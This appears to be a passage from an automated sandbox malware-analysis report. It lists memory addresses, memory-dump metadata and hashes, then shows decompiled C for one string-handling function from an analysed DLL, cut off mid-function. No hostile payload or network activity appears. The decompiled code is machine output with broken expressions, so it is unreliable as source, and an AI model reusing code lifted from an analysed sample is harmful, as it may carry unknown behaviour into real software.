0x6e79bd7f
0x6e79bd7f
0x6e79bd80
0x6e79bd85
0x6e79bd8a
0x6e79bd8c
0x00000000
0x00000000
0x6e79bd8e
0x6e79bd92
0x6e79bd96
0x6e79bd98
0x00000000
0x00000000
0x00000000
0x6e79bd98
0x00000000
0x6e79bd7f
0x6e79bd6d
0x6e79bd21
0x00000000
0x6e79bd21
0x6e79bca3
0x6e79bca3
0x6e79bca6
0x6e79bcc3
0x6e79bccf
0x6e79bccf
0x6e79bcd5
0x6e79bcd5
0x6e79bcda
0x6e79bcde
0x6e79bce2
0x6e79bce4
0x00000000
0x00000000
0x6e79bcea
0x6e79bced
0x6e79bcef
0x00000000
0x00000000
0x6e79bcf1
0x6e79bcf7
0x6e79bd0a
0x6e79bd0a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79bcf9
0x6e79bcf9
0x6e79bcfd
0x6e79bcff
0x00000000
0x00000000
0x6e79bd01
0x6e79bd02
0x6e79bd08
0x00000000
0x00000000
0x00000000
0x6e79bd08
0x00000000
0x6e79bcf9
0x6e79be7a
0x6e79be7f
0x00000000
0x6e79be7f
0x6e79bca8
0x6e79bcaa
0x6e79bcad
0x00000000
0x00000000
0x6e79bcb4
0x6e79bcb4
0x6e79bcb6
0x6e79bcb6
0x6e79bcba
0x6e79bcbc
0x00000000
0x00000000
0x6e79bcbe
0x6e79bcbf
0x6e79bcc1
0x00000000
0x00000000
0x00000000
0x6e79bcc1
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79bc55
0x6e79bc55
0x6e79bc59
0x6e79bc5b
0x00000000
0x00000000
0x6e79bc5d
0x6e79bc5e
0x6e79bc64
0x00000000
0x00000000
0x00000000
0x6e79bc64
0x00000000
0x6e79bc55
0x6e79be86
0x6e79be8b
0x00000000
0x6e79be8b
0x6e79bc01
0x6e79bc03
0x6e79bc09
0x00000000
0x00000000
0x6e79bc10
0x6e79bc10
0x6e79bc12
0x6e79bc12
0x6e79bc16
0x6e79bc18
0x00000000
0x00000000
0x6e79bc1a
0x6e79bc1b
0x6e79bc1d
0x00000000
0x00000000
0x00000000
0x6e79bc1d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79bbe4
0x6e79bbe4
0x6e79bbe8
0x6e79bbea
0x00000000
0x00000000
0x6e79bbec
0x6e79bbed
0x6e79bbf3
0x00000000
0x00000000
0x00000000
0x6e79bbf3
0x00000000
0x6e79bbe4
0x6e79be92
0x6e79be97
0x00000000
0x6e79be97
0x6e79bb8a
0x6e79bb8c
0x6e79bb91
0x00000000
0x00000000
0x6e79bb93
0x6e79bb97
0x6e79bb99
0x6e79bb9d
0x6e79bb9f
0x00000000
0x00000000
0x6e79bba5
0x6e79bba6
0x6e79bba8
0x00000000
0x00000000
0x6e79bbaa
0x00000000
0x6e79bbaa
0x6e79be3f
0x00000000
0x6e79be3f
0x6e79bb64
0x6e79bb65
0x6e79bb69
0x00000000
0x00000000
0x00000000
0x6e79bb69
0x6e79be9e
0x6e79bea1
0x6e79bea5
0x6e79beab
0x6e79beab
0x6e79beae
0x00000000
0x00000000
0x6e79beb8
0x6e79beba
0x00000000
0x00000000
0x6e79bec0
0x6e79bec3
0x6e79bec3
0x6e79bec5
0x6e79bec9
0x6e79becd
0x6e79bed1
0x6e79bed1
0x6e79bedb
0x6e79bede
0x6e79bee4
0x6e79beee
0x6e79bef1
0x6e79bef4
0x00000000
0x00000000
0x6e79befe
0x6e79bf00
0x00000000
0x00000000
0x00000000
0x6e79bf02
0x6e79ba62
0x6e79ba65
0x6e79ba69
0x00000000
0x6e79ba69
0x6e79bf07
0x6e79bf0b
0x6e79be5f
0x6e79be5f
0x6e79be61
0x00000000
0x00000000
0x6e79be67
0x00000000
0x00000000
0x6e79be6d
0x6e79be71
0x00000000
0x6e79be71
0x6e79ba79
0x6e79ba7d
0x6e79ba7f
0x6e79ba83
0x6e79ba87
0x6e79ba8b
0x6e79ba8d
0x00000000
0x00000000
0x6e79ba93
0x6e79ba94
0x6e79ba96
0x00000000
0x00000000
0x6e79ba98
0x6e79ba9c
0x6e79baa0
0x00000000
0x6e79baa0
0x6e79be53
0x6e79be57
0x6e79be5b
0x00000000
0x6e79baa4
0x6e79bab0
0x6e79bab4
0x6e79bab4
0x6e79bab9
0x6e79babd
0x6e79bac1
0x6e79bac1
0x6e79bac6
0x6e79baca
0x6e79bace
0x6e79bad0
0x00000000
0x00000000
0x6e79bad6
0x6e79bad9
0x6e79badb
0x00000000
0x00000000
0x6e79badd
0x6e79bae1
0x6e79bae5
0x6e79bae9
0x6e79baee
0x00000000
0x00000000
0x00000000
0x6e79baee
0x6e79bf16
0x6e79bf1b
0x6e79bf1f
0x6e79bf21
0x6e79bf25
0x00000000
0x6e79bf25
0x6e79ba6d
0x00000000
0x6e79b8d2
0x6e79b861
0x6e79b864
0x6e79b867
0x6e79b869
0x00000000
0x00000000
0x6e79b86b
0x6e79b86e
0x6e79b86e
0x6e79b870
0x6e79b870
0x6e79b871
0x6e79b876
0x6e79b87b
0x6e79b87d
0x00000000
0x00000000
0x6e79b87f
0x6e79b883
0x6e79b887
0x6e79b889
0x00000000
0x00000000
0x00000000
0x6e79b889
0x6e79b88b
0x00000000
0x6e79b88b
0x6e79b85b
0x6e79b811
0x00000000
0x6e79b811
0x6e79b783
0x6e79b783
0x6e79b786
0x6e79b7a6
0x6e79b7aa
0x6e79b7b6
0x6e79b7b6
0x6e79b7bc
0x6e79b7bc
0x6e79b7c1
0x6e79b7c5
0x6e79b7c9
0x6e79b7cb
0x00000000
0x00000000
0x6e79b7d1
0x6e79b7d4
0x6e79b7d6
0x00000000
0x00000000
0x6e79b7d8
0x6e79b7de
0x6e79b7f5
0x6e79b7f5
0x6e79b7fa
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79b7e0
0x6e79b7e0
0x6e79b7e4
0x6e79b7e6
0x00000000
0x00000000
0x6e79b7ec
0x6e79b7ed
0x6e79b7f3
0x00000000
0x00000000
0x00000000
0x6e79b7f3
0x6e79ba15
0x6e79ba15
0x6e79ba18
0x6e79ba28
0x6e79ba1a
0x6e79ba1c
0x6e79ba1f
0x6e79ba1f
0x00000000
0x6e79ba18
0x6e79bf2e
0x6e79bf33
0x00000000
0x6e79bf33
0x6e79b788
0x6e79b78a
0x6e79b78c
0x00000000
0x00000000
0x6e79b793
0x6e79b793
0x6e79b795
0x6e79b795
0x6e79b799
0x6e79b79b
0x00000000
0x00000000
0x6e79b7a1
0x6e79b7a2
0x6e79b7a4
0x00000000
0x00000000
0x00000000
0x6e79b7a4
0x00000000
0x6e79b795
0x6e79b770
0x00000000
0x6e79b770
0x6e79b721
0x6e79b74a
0x6e79b74a
0x6e79b74c
0x6e79b74d
0x6e79b752
0x00000000
0x6e79b752
0x6e79b723
0x6e79b726
0x6e79b72b
0x00000000
0x00000000
0x6e79b72f
0x6e79b72f
0x6e79b730
0x6e79b735
0x6e79b73c
0x00000000
0x00000000
0x6e79b73e
0x6e79b742
0x6e79b748
0x00000000
0x00000000
0x00000000
0x6e79b748
0x00000000

Strings

@, xrefs: 6E79B760

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction ID: 854f7fe7e9fad29743331e2424f3674ca6f24e3f704c42624ef55c4d96c7b859
Opcode Fuzzy Hash: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction Fuzzy Hash: 48322575A187138BD744CFA9E59022A72E2FFC5710F14863DE8A18B3B8EB34E805D785

Uniqueness

Uniqueness Score: -1.00%

Function 6E79A660, Relevance: 1.9, Strings: 1, Instructions: 690
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E79A660(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t219;
				signed int _t220;
				signed int _t221;
				signed int _t224;
				signed short** _t227;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				unsigned int _t242;
				signed int _t248;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t260;
				signed int _t263;
				signed int _t264;
				unsigned int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t288;
				signed int _t293;
				signed int _t294;
				signed int _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t309;
				signed int _t312;
				unsigned int _t318;
				signed int _t319;
				signed int _t321;
				signed short* _t323;
				signed int _t324;
				signed int _t325;
				unsigned int _t326;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed short* _t344;
				signed int _t345;
				signed short* _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t356;
				signed int _t362;
				unsigned int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t369;
				signed int _t370;
				signed int _t371;
				signed int _t376;
				signed int _t378;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t403;
				signed int _t404;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				signed int _t418;
				signed int _t421;
				signed int* _t422;
				signed int _t425;
				signed int _t428;
				signed int _t432;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t444;
				void* _t447;

				_t312 = __ecx;
				_t296 = 0;
				_v40 = 0;
				_t398 = __ecx;
				_v36 = 0;
				_push(0x80);
				_t417 = E6E791030();
				_t447 = (_t444 & 0xfffffff0) - 0x34 + 4;
				_t344 = _v40;
				if(_t344 == 0) {
					 *_t417 = 0;
					L8:
					_v36 = 0x40;
					_v40 = _t417;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t417;
						if(_t417 == 0) {
							_t418 = 0x40;
							_t345 = _t296;
							L23:
							_t24 = _t345 + 2; // -2147483652
							_t219 = _t24;
							__eflags = _t219 - 0x40;
							_t220 =  <=  ? 0x40 : _t219;
							__eflags = _t418 - _t220;
							if(_t418 < _t220) {
								_t318 = (_t220 >> 5 >> 0x1a) + _t220 >> 6;
								_t221 = _t220 & 0x8000003f;
								__eflags = _t221;
								if(_t221 < 0) {
									_t221 = (_t221 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t221;
								}
								__eflags = _t221;
								_t319 = _t318 + (_t296 & 0xffffff00 | _t221 > 0x00000000);
								_v64 = _t319 << 6;
								_push(_t319 << 7);
								_v60 = _t345;
								_t224 = E6E791030();
								_t345 = _v60;
								_t421 = _t224;
								_t447 = _t447 + 4;
								_t321 = _v40;
								__eflags = _t321;
								if(_t321 == 0) {
									 *_t421 = _t296;
									goto L36;
								} else {
									__eflags = _t421;
									if(_t421 == 0) {
										L34:
										_push(2);
										_push(_t321);
										_v60 = _t345;
										E6E7910B0();
										_t345 = _v60;
										_t447 = _t447 + 8;
										L36:
										_v36 = _v64;
										_v40 = _t421;
										L37:
										 *((short*)(_t421 + _t345 * 2)) = _a8 & 0x0000ffff;
										_t227 =  &_v40;
										 *( *_t227 + 2 + _t345 * 2) = _t296;
										L38:
										_t346 =  *_t227;
										_t422 = _a4;
										if(_t346 == 0) {
											L40:
											_push(0x80);
											 *_t422 = _t296;
											_t422[1] = _t296;
											_t399 = E6E791030();
											_t447 = _t447 + 4;
											_t323 =  *_t422;
											if(_t323 == 0) {
												 *_t399 = _t296;
												L62:
												 *_t422 = _t399;
												_t422[1] = 0x40;
												L63:
												_push(2);
												_push(_v40);
												E6E7910B0();
												_v40 = _t296;
												_v36 = _t296;
												return _t422;
											}
											if(_t399 == 0) {
												L46:
												_push(2);
												_push(_t323);
												E6E7910B0();
												_t447 = _t447 + 8;
												goto L62;
											}
											_t347 =  *_t323 & 0x0000ffff;
											 *_t399 = _t347;
											if(_t347 == 0) {
												goto L46;
											}
											_t348 = _t296;
											while(1) {
												_t348 = _t348 + 1;
												_t232 =  *(_t323 + _t348 * 4 - 2) & 0x0000ffff;
												 *(_t399 + _t348 * 4 - 2) = _t232;
												if(_t232 == 0) {
													goto L46;
												}
												_t233 =  *(_t323 + _t348 * 4) & 0x0000ffff;
												 *(_t399 + _t348 * 4) = _t233;
												if(_t233 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t234 =  *_t346 & 0x0000ffff;
										if(_t234 != 0) {
											_t324 =  *_t398;
											__eflags = _t324;
											if(_t324 == 0) {
												L54:
												_push(0x80);
												 *_t422 = _t296;
												_t422[1] = _t296;
												_t399 = E6E791030();
												_t447 = _t447 + 4;
												_t325 =  *_t422;
												__eflags = _t325;
												if(_t325 == 0) {
													 *_t399 = _t296;
													goto L62;
												}
												__eflags = _t399;
												if(_t399 == 0) {
													L60:
													_push(2);
													_push(_t325);
													E6E7910B0();
													_t447 = _t447 + 8;
													goto L62;
												}
												_t349 =  *_t325 & 0x0000ffff;
												 *_t399 = _t349;
												__eflags = _t349;
												if(_t349 == 0) {
													goto L60;
												}
												_t350 = _t296;
												while(1) {
													_t350 = _t350 + 1;
													_t237 =  *(_t325 + _t350 * 4 - 2) & 0x0000ffff;
													 *(_t399 + _t350 * 4 - 2) = _t237;
													__eflags = _t237;
													if(_t237 == 0) {
														goto L60;
													}
													_t238 =  *(_t325 + _t350 * 4) & 0x0000ffff;
													 *(_t399 + _t350 * 4) = _t238;
													__eflags = _t238;
													if(_t238 != 0) {
														continue;
													}
													goto L60;
												}
												goto L60;
											}
											__eflags =  *_t324 & 0x0000ffff;
											if(( *_t324 & 0x0000ffff) == 0) {
												goto L54;
											}
											_v32 = _t346;
											__eflags = _t234 - 0x41 - 0x19;
											_t239 =  <=  ? _t234 + 0x20 : _t234;
											_t403 = _t296;
											_t240 = ( <=  ? _t234 + 0x20 : _t234) & 0x0000ffff;
											_v48 = _t240;
											while(1) {
												_t425 =  *(_t324 + _t403 * 2) & 0x0000ffff;
												__eflags = _t425 - 0x41 - 0x19;
												_t426 =  <=  ? _t425 + 0x20 : _t425;
												__eflags = ( <=  ? _t425 + 0x20 : _t425) - _t240;
												if(( <=  ? _t425 + 0x20 : _t425) == _t240) {
													break;
												}
												_t403 = _t403 + 1;
												__eflags =  *(_t324 + _t403 * 2) & 0x0000ffff;
												if(( *(_t324 + _t403 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												L53:
												_t422 = _a4;
												_t296 = 0;
												__eflags = 0;
												goto L54;
											}
											_t352 = _v32;
											_t404 = _t324 + _t403 * 2;
											_t422 = _a4;
											_t296 = 0;
											__eflags = _t404;
											if(_t404 == 0) {
												goto L54;
											}
											_t428 = _t352 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_v64 = _t428;
											_t242 = _t428 & 0x00000001;
											_v52 = _t242;
											_v56 =  ~_t428 + 0x10 >> 1;
											_v60 = _t324;
											_v32 = _t352;
											_t432 = _v64;
											_t299 = _v56;
											_t326 = _t242;
											while(1) {
												L70:
												_t353 = _t432;
												__eflags = _t432;
												if(_t432 == 0) {
													goto L76;
												}
												_t251 = 0;
												__eflags = _t326;
												if(_t326 != 0) {
													L80:
													_t333 = _v32;
													while(1) {
														__eflags =  *(_t333 + _t251 * 2) & 0x0000ffff;
														if(( *(_t333 + _t251 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t251 = _t251 + 1;
														__eflags = _t251 - 0x7fffffff;
														if(_t251 < 0x7fffffff) {
															continue;
														}
														_v32 = _t333;
														L84:
														_t251 = 0x7fffffff;
														L85:
														_v68 = _t251;
														_t354 = 0;
														__eflags = 0;
														while(1) {
															_t302 =  *(_t404 + _t354 * 2) & 0x0000ffff;
															_t434 =  *(_v32 + _t354 * 2) & 0x0000ffff;
															__eflags = _t302 - 0x61 - 0x19;
															_t303 =  <=  ? _t302 - 0x20 : _t302;
															_t253 = ( <=  ? _t302 - 0x20 : _t302) & 0x0000ffff;
															__eflags = _t434 - 0x61 - 0x19;
															_t435 =  <=  ? _t434 - 0x20 : _t434;
															__eflags = _t253 - ( <=  ? _t434 - 0x20 : _t434);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t253;
															if(_t253 == 0) {
																L90:
																_t335 = _v60;
																_t296 = 0;
																_t422 = _a4;
																__eflags = _t404;
																if(_t404 == 0) {
																	goto L54;
																}
																_t406 = _t404 - _t335;
																__eflags = _t406;
																_t407 = _t406 >> 1;
																if(_t406 != 0) {
																	_t257 = _t335 & 0x0000000f;
																	__eflags = _t257;
																	if(_t257 == 0) {
																		L106:
																		_t362 =  ~( ~_t257 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t362;
																		while(1) {
																			asm("movdqu xmm1, [ecx+eax*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb ebx, xmm1");
																			__eflags = _t296;
																			if(_t296 != 0) {
																				break;
																			}
																			_t257 = _t257 + 8;
																			__eflags = _t257 - _t362;
																			if(_t257 < _t362) {
																				continue;
																			}
																			_t296 = 0;
																			__eflags = _t362 - 0x7fffffff;
																			if(_t362 >= 0x7fffffff) {
																				L112:
																				_t362 = 0x7fffffff;
																				L113:
																				_t260 = _t362 >> 0x0000001f & _t362;
																				_t365 = _t362 - _t260;
																				__eflags = _t407;
																				if(_t407 < 0) {
																					L115:
																					_t407 = _t365;
																					L116:
																					 *_t422 = _t296;
																					_t336 = _t335 + _t260 * 2;
																					_t422[1] = _t296;
																					__eflags = _t336;
																					if(_t336 == 0) {
																						L151:
																						_push(0x80);
																						_t399 = E6E791030();
																						_t447 = _t447 + 4;
																						_t337 =  *_t422;
																						__eflags = _t337;
																						if(_t337 == 0) {
																							 *_t399 = _t296;
																							goto L62;
																						}
																						__eflags = _t399;
																						if(_t399 == 0) {
																							L157:
																							_push(2);
																							_push(_t337);
																							E6E7910B0();
																							_t447 = _t447 + 8;
																							goto L62;
																						}
																						_t366 =  *_t337 & 0x0000ffff;
																						 *_t399 = _t366;
																						__eflags = _t366;
																						if(_t366 == 0) {
																							goto L157;
																						}
																						_t367 = _t296;
																						while(1) {
																							_t367 = _t367 + 1;
																							_t263 =  *(_t337 + _t367 * 4 - 2) & 0x0000ffff;
																							 *(_t399 + _t367 * 4 - 2) = _t263;
																							__eflags = _t263;
																							if(_t263 == 0) {
																								goto L157;
																							}
																							_t264 =  *(_t337 + _t367 * 4) & 0x0000ffff;
																							 *(_t399 + _t367 * 4) = _t264;
																							__eflags = _t264;
																							if(_t264 != 0) {
																								continue;
																							}
																							goto L157;
																						}
																						goto L157;
																					}
																					__eflags =  *_t336 & 0x0000ffff;
																					if(( *_t336 & 0x0000ffff) == 0) {
																						goto L151;
																					}
																					__eflags = _t407;
																					if(_t407 != 0) {
																						L131:
																						_t159 = _t407 + 1; // 0x80000000
																						_t369 = _t159;
																						__eflags = _t369 - 0x40;
																						_t370 =  <=  ? 0x40 : _t369;
																						__eflags = _t370;
																						if(_t370 > 0) {
																							_t270 = (_t370 >> 5 >> 0x1a) + _t370 >> 6;
																							_t371 = _t370 & 0x8000003f;
																							__eflags = _t371;
																							if(_t371 < 0) {
																								_t371 = (_t371 - 0x00000001 | 0xffffffc0) + 1;
																								__eflags = _t371;
																							}
																							__eflags = _t371;
																							_t271 = _t270 + (_t296 & 0xffffff00 | _t371 > 0x00000000);
																							_v64 = _t271 << 6;
																							_push(_t271 << 7);
																							_v60 = _t336;
																							_t273 = E6E791030();
																							_t336 = _v60;
																							_t447 = _t447 + 4;
																							_t376 =  *_t422;
																							__eflags = _t376;
																							if(_t376 == 0) {
																								 *_t273 = _t296;
																								goto L143;
																							} else {
																								__eflags = _t273;
																								if(_t273 == 0) {
																									L141:
																									_push(2);
																									_push(_t376);
																									_v68 = _t273;
																									_v60 = _t336;
																									E6E7910B0();
																									_t336 = _v60;
																									_t273 = _v68;
																									_t447 = _t447 + 8;
																									L143:
																									_t422[1] = _v64;
																									 *_t422 = _t273;
																									L144:
																									__eflags = _t273;
																									if(_t273 == 0) {
																										goto L63;
																									}
																									_t378 = _t296;
																									while(1) {
																										_t309 =  *_t336 & 0x0000ffff;
																										_t378 = _t378 + 1;
																										 *_t273 = _t309;
																										__eflags = _t407;
																										if(_t407 == 0) {
																											goto L149;
																										}
																										__eflags = _t378 - _t407;
																										if(_t378 == _t407) {
																											_t296 = 0;
																											 *(_t273 + 2) = 0;
																											goto L63;
																										}
																										L149:
																										__eflags = _t309;
																										if(_t309 == 0) {
																											_t296 = 0;
																											goto L63;
																										}
																										_t273 = _t273 + 2;
																										_t336 = _t336 + 2;
																										__eflags = _t336;
																									}
																								}
																								_t438 =  *_t376 & 0x0000ffff;
																								 *_t273 = _t438;
																								__eflags = _t438;
																								_t422 = _a4;
																								if(_t438 == 0) {
																									goto L141;
																								} else {
																									goto L138;
																								}
																								while(1) {
																									L138:
																									_t296 = _t296 + 1;
																									_t439 =  *(_t376 + _t296 * 4 - 2) & 0x0000ffff;
																									 *(_t273 + _t296 * 4 - 2) = _t439;
																									__eflags = _t439;
																									if(_t439 == 0) {
																										break;
																									}
																									_t440 =  *(_t376 + _t296 * 4) & 0x0000ffff;
																									 *(_t273 + _t296 * 4) = _t440;
																									__eflags = _t440;
																									if(_t440 != 0) {
																										continue;
																									}
																									break;
																								}
																								_t422 = _a4;
																								_t296 = 0;
																								__eflags = 0;
																								goto L141;
																							}
																						}
																						_t273 = _t296;
																						goto L144;
																					}
																					_t382 = _t336 & 0x0000000f;
																					__eflags = _t382;
																					if(_t382 == 0) {
																						L124:
																						_t407 =  ~( ~_t382 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t407;
																						while(1) {
																							asm("movdqu xmm1, [ecx+edx*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb eax, xmm1");
																							__eflags = _t260;
																							if(_t260 != 0) {
																								break;
																							}
																							_t382 = _t382 + 8;
																							__eflags = _t382 - _t407;
																							if(_t382 < _t407) {
																								continue;
																							}
																							__eflags = _t407 - 0x7fffffff;
																							if(_t407 >= 0x7fffffff) {
																								L130:
																								_t407 = 0x7fffffff;
																								goto L131;
																							} else {
																								goto L128;
																							}
																							while(1) {
																								L128:
																								__eflags =  *(_t336 + _t407 * 2) & 0x0000ffff;
																								if(( *(_t336 + _t407 * 2) & 0x0000ffff) == 0) {
																									goto L131;
																								}
																								_t407 = _t407 + 1;
																								__eflags = _t407 - 0x7fffffff;
																								if(_t407 < 0x7fffffff) {
																									continue;
																								}
																								goto L130;
																							}
																							goto L131;
																						}
																						asm("bsf edi, eax");
																						_t407 = (_t407 >> 1) + _t382;
																						goto L131;
																					}
																					_t407 = _t296;
																					__eflags = _t382 & 0x00000001;
																					if((_t382 & 0x00000001) != 0) {
																						goto L128;
																					}
																					_t382 =  ~_t382 + 0x10 >> 1;
																					__eflags = _t382;
																					while(1) {
																						_t260 =  *(_t336 + _t407 * 2) & 0x0000ffff;
																						__eflags = _t260;
																						if(_t260 == 0) {
																							goto L131;
																						}
																						_t407 = _t407 + 1;
																						__eflags = _t407 - _t382;
																						if(_t407 < _t382) {
																							continue;
																						}
																						goto L124;
																					}
																					goto L131;
																				}
																				__eflags = _t407 - _t365;
																				if(_t407 <= _t365) {
																					goto L116;
																				}
																				goto L115;
																			} else {
																				goto L110;
																			}
																			while(1) {
																				L110:
																				__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																				if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																					goto L113;
																				}
																				_t362 = _t362 + 1;
																				__eflags = _t362 - 0x7fffffff;
																				if(_t362 < 0x7fffffff) {
																					continue;
																				}
																				goto L112;
																			}
																			goto L113;
																		}
																		_t363 = _t296;
																		_t296 = 0;
																		asm("bsf edx, edx");
																		_t362 = (_t363 >> 1) + _t257;
																		goto L113;
																	}
																	_t362 = 0;
																	__eflags = _t257 & 0x00000001;
																	if((_t257 & 0x00000001) != 0) {
																		goto L110;
																	}
																	_t257 =  ~_t257 + 0x10 >> 1;
																	__eflags = _t257;
																	while(1) {
																		__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																		if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																			break;
																		}
																		_t362 = _t362 + 1;
																		__eflags = _t362 - _t257;
																		if(_t362 < _t257) {
																			continue;
																		}
																		_t296 = 0;
																		__eflags = 0;
																		goto L106;
																	}
																	_t296 = 0;
																	goto L113;
																}
																_push(0x80);
																 *_t422 = 0;
																_t422[1] = 0;
																_t399 = E6E791030();
																_t447 = _t447 + 4;
																_t338 =  *_t422;
																__eflags = _t338;
																if(_t338 == 0) {
																	 *_t399 = 0;
																	goto L62;
																}
																__eflags = _t399;
																if(_t399 == 0) {
																	L98:
																	_push(2);
																	_push(_t338);
																	E6E7910B0();
																	_t447 = _t447 + 8;
																	goto L62;
																}
																_t386 =  *_t338 & 0x0000ffff;
																 *_t399 = _t386;
																__eflags = _t386;
																if(_t386 == 0) {
																	goto L98;
																}
																_t387 = 0;
																while(1) {
																	_t387 = _t387 + 1;
																	_t280 =  *(_t338 + _t387 * 4 - 2) & 0x0000ffff;
																	 *(_t399 + _t387 * 4 - 2) = _t280;
																	__eflags = _t280;
																	if(_t280 == 0) {
																		goto L98;
																	}
																	_t281 =  *(_t338 + _t387 * 4) & 0x0000ffff;
																	 *(_t399 + _t387 * 4) = _t281;
																	__eflags = _t281;
																	if(_t281 != 0) {
																		continue;
																	}
																	goto L98;
																}
																goto L98;
															}
															_t354 = _t354 + 1;
															__eflags = _t354 - _v68;
															if(_t354 < _v68) {
																continue;
															}
															goto L90;
														}
														_t356 = _t404 + 2;
														__eflags = _t356;
														if(_t356 == 0) {
															goto L53;
														}
														__eflags =  *(_t404 + 2) & 0x0000ffff;
														if(( *(_t404 + 2) & 0x0000ffff) == 0) {
															goto L53;
														}
														_v44 = _t404;
														_t255 = 0;
														__eflags = 0;
														while(1) {
															_t255 = _t255 + 1;
															_t404 = _v44 + _t255 * 2;
															_t331 =  *_t404 & 0x0000ffff;
															__eflags = ( *(_t356 + _t255 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t332 =  <=  ? _t331 + 0x20 : _t331;
															__eflags = ( <=  ? _t331 + 0x20 : _t331) - _v48;
															if(( <=  ? _t331 + 0x20 : _t331) == _v48) {
																break;
															}
															__eflags =  *(_t356 + _t255 * 2) & 0x0000ffff;
															if(( *(_t356 + _t255 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L53;
														}
														_t432 = _v64;
														_t299 = _v56;
														_t326 = _v52;
														goto L70;
													}
													_v32 = _t333;
													L163:
													__eflags = _t251;
													if(__eflags == 0) {
														goto L84;
													}
													if(__eflags > 0) {
														goto L85;
													}
													goto L90;
												}
												_t441 = _v32;
												_t353 = _t299;
												while(1) {
													__eflags =  *(_t441 + _t251 * 2) & 0x0000ffff;
													if(( *(_t441 + _t251 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t251 = _t251 + 1;
													__eflags = _t251 - _t299;
													if(_t251 < _t299) {
														continue;
													}
													_v32 = _t441;
													_t326 = _v52;
													goto L76;
												}
												_v32 = _t441;
												goto L163;
												L76:
												_t300 = _v32;
												_t248 =  ~( ~_t353 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t248;
												while(1) {
													asm("movdqu xmm1, [ebx+edx*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb ecx, xmm1");
													__eflags = _t326;
													if(_t326 != 0) {
														break;
													}
													_t353 = _t353 + 8;
													__eflags = _t353 - _t248;
													if(_t353 < _t248) {
														continue;
													}
													_v32 = _t300;
													__eflags = _t248 - 0x7fffffff;
													if(_t248 >= 0x7fffffff) {
														goto L84;
													}
													goto L80;
												}
												asm("bsf eax, eax");
												_v32 = _t300;
												_t251 = (_t326 >> 1) + _t353;
												goto L163;
											}
										}
										goto L40;
									}
									_t283 =  *_t321 & 0x0000ffff;
									 *_t421 = _t283;
									__eflags = _t283;
									if(_t283 == 0) {
										goto L34;
									}
									_v68 = _t398;
									_t284 = _t296;
									while(1) {
										_t284 = _t284 + 1;
										_t414 =  *(_t321 + _t284 * 4 - 2) & 0x0000ffff;
										 *(_t421 + _t284 * 4 - 2) = _t414;
										__eflags = _t414;
										if(_t414 == 0) {
											break;
										}
										_t415 =  *(_t321 + _t284 * 4) & 0x0000ffff;
										 *(_t421 + _t284 * 4) = _t415;
										__eflags = _t415;
										if(_t415 != 0) {
											continue;
										}
										break;
									}
									_t398 = _v68;
									goto L34;
								}
							}
							_t421 = _v40;
							goto L37;
						}
						_t288 = _t417 & 0x0000000f;
						__eflags = _t288;
						if(_t288 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t395 =  ~( ~_t288 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t395;
							while(1) {
								asm("movdqu xmm1, [esi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
